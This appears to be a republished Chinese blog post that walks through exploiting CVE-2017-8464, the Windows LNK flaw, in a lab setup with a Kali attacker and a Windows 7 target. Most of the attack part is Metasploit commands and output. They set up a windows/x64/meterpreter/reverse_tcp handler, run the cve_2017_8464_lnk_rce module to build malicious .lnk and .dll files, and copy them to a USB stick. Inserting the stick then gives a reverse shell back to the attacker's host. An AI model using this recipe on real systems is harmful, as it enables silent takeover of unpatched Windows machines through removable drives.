號稱“震網三代”的遠程代碼執行漏洞,利用U盤獲取系統權限

17年的問題,最近清理以前磁盤的文件發現這個記錄文檔,寫在這裡。

引言

微軟在2017年6月中旬發佈的補丁包中包含了一個關於LNK文件遠程代碼執行的漏洞,CVE編號為CVE-2017-8464,描述如果系統處理了惡意的.LNK文件,則可能允許遠程執行代碼,成功利用這個漏洞會獲得與本地用戶相同的用戶權限,攻擊者可以通過任意可移動驅動器(如U盤)或者遠程共享的方式傳播攻擊。我們以U盤測試,當受害者主機加載該U盤即會受到攻擊,無需受害者手動點擊訪問U盤,斷開U盤shell會話保持。

當時影響任何未安裝CVE-2017-8464補丁的Windows系統,可繞過MS10-046 & MS15-020補丁防護,涉及Microsoft Windows 10、Microsoft Windows 7、Microsoft Windows 8、Microsoft Windows 8.1、Microsoft Windows Server 2008、Microsoft Windows Server 2012、Microsoft Windows Server 2016。

漏洞利用

測試環境:

攻擊機:kali 2.0(192.168.80.226)

靶機:win7 x64(192.168.80.114)

1、下載exp放在kali對應目錄(新版kali應該已經自帶了),此處以放在該測試目錄為例(kali2.0:
/usr/share/metasploit-framework/modules/exploit/windows/smb/),在kali裡配置監聽

<code>

msf

>

use

exploit/multi/handler

msf

exploit(handler)

>

set

PAYLOAD

windows/x64/meterpreter/reverse_tcp

PAYLOAD

=>

windows/x64/meterpreter/reverse_tcp

msf

exploit(handler)

>

set

LHOST

192.168

.80

.226

LHOST

=>

192.168

.80

.226

msf

exploit(handler)

>

exploit

-j

[*]

Exploit

running

as

background

job.

[*]

Started

reverse

TCP

handler

on

192.168

.80

.226

:4444

msf

exploit(handler)

>

[*]

Starting

the

payload

handler...

back

/<code>
<code>

msf

>

use

exploit/windows/smb/cve_2017_8464_lnk_rce

msf

exploit(cve_2017_8464_lnk_rce)

>

set

PAYLOAD

windows/x64/meterpreter/reverse_tcp

PAYLOAD

=>

windows/x64/meterpreter/reverse_tcp

msf

exploit(cve_2017_8464_lnk_rce)

>

set

LHOST

192.168

.80

.226

LHOST

=>

192.168

.80

.226

/<code>
<code>

msf

exploit

(cve_2017_8464_lnk_rce) >

exploit

/<code>

執行成功後會在/root/.msf4/local/*目錄生成.dll和.lnk文件

2、在kali里加載U盤,複製文件到U盤根目錄

查看加載的U盤:

號稱“震網三代”的遠程代碼執行漏洞,利用U盤獲取系統權限

將kali目錄 /root/.msf4/local/* 下的 .lnk文件複製到U盤根目錄

號稱“震網三代”的遠程代碼執行漏洞,利用U盤獲取系統權限

複製完成後的U盤根目錄

號稱“震網三代”的遠程代碼執行漏洞,利用U盤獲取系統權限

3、在靶機上插入U盤,無需手動點擊訪問U盤,靶機即可受到攻擊,測試在win7靶機中插入U盤時,kali攻擊機收到反彈的shell

號稱“震網三代”的遠程代碼執行漏洞,利用U盤獲取系統權限

號稱“震網三代”的遠程代碼執行漏洞,利用U盤獲取系統權限


分享到:


相關文章: